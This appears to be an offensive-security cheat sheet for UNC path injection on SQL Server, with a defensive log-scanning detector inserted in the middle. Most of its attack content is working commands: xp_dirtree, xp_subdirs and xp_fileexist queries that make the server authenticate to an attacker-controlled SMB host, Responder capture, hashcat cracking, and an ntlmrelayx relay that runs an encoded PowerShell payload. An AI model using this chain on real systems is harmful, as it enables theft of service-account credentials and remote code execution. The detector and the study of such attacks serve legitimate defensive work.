UNC Path Injection
Overview
This attack abuses the xp_dirtree extended stored procedure to force a SQL Server to connect to an SMB share that the attacker controls, allowing the attacker to capture the Net-NTLM hash of the SQL Server service account so that it can be cracked offline or relayed.
Examples
xp_dirtree
The following SQL query can be used:
EXEC master..xp_dirtree '\\192.168.119.120\test';
xp_subdirs
The following SQL query can be used:
EXEC master..xp_subdirs '\\192.168.119.120\test';
xp_fileexist
The following SQL query can be used:
EXEC master..xp_fileexist '\\192.168.119.120\test';
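All three procedures above take a path argument and will make the SQL Server service account authenticate to whatever UNC host that path names. As an added example (not part of the original page), the following detector scans constructed query-log entries for calls to xp_dirtree, xp_subdirs or xp_fileexist with a UNC argument and reports the host each call would authenticate to, so unexpected destinations can be flagged; the log format and the allowlisted host name are assumptions.

```python
import re
from typing import Dict, List, Set

# Extended stored procedures that resolve a caller-supplied path, UNC included.
UNC_PROCS = ("xp_dirtree", "xp_subdirs", "xp_fileexist")

# Matches e.g.  EXEC master..xp_dirtree '\\192.168.119.120\test';
# and captures the procedure name plus the UNC host (IP address or hostname).
UNC_CALL = re.compile(
    r"(?:EXEC(?:UTE)?\s+)?(?:master\s*\.\s*\.\s*|master\.dbo\.)?"
    r"(?P<proc>" + "|".join(UNC_PROCS) + r")\s*"
    r"['\"]\\\\(?P<host>[^\\'\"]+)",
    re.IGNORECASE,
)


def find_unc_calls(log_lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per log line that calls a UNC-capable xp_* procedure."""
    findings = []
    for line in log_lines:
        m = UNC_CALL.search(line)
        if m:
            findings.append(
                {"proc": m.group("proc").lower(), "host": m.group("host"), "line": line}
            )
    return findings


def flag_unknown_hosts(findings: List[Dict[str, str]], allowlist: Set[str]) -> List[Dict[str, str]]:
    """Keep only findings whose UNC host is not a known, approved file server."""
    return [f for f in findings if f["host"].lower() not in {h.lower() for h in allowlist}]


# Constructed sample entries (assumed "<timestamp> <login> <statement>" format, not real logs):
# a local-path call, two UNC calls (one to an approved server), and an unrelated query.
SAMPLE_LOG = [
    "2024-01-01T10:00:00 app_user EXEC master..xp_dirtree 'C:\\Backups';",
    "2024-01-01T10:00:05 app_user EXEC master..xp_dirtree '\\\\192.168.119.120\\test';",
    "2024-01-01T10:00:09 app_user EXEC master..xp_fileexist \"\\\\fileserver01\\share\\x.txt\";",
    "2024-01-01T10:00:12 app_user SELECT name FROM sys.tables;",
]

if __name__ == "__main__":
    # Hosts the database is legitimately expected to reach (assumed allowlist).
    for f in flag_unknown_hosts(find_unc_calls(SAMPLE_LOG), {"fileserver01"}):
        print(f"{f['proc']} -> \\\\{f['host']}  ::  {f['line']}")
```

Only the call targeting 192.168.119.120 survives the allowlist filter; the local-path call never matches because the argument does not start with a UNC prefix.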
Capturing/Relaying the Net-NTLM hash
Using Responder to capture the Net-NTLM hash
sudo responder -I tap0
# hashcat command to crack the hash
hashcat -m 5600 hash.txt dict.txt --force
Relaying the Net-NTLM hash
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.120.6 -c 'powershell -enc <base64 encoded payload>'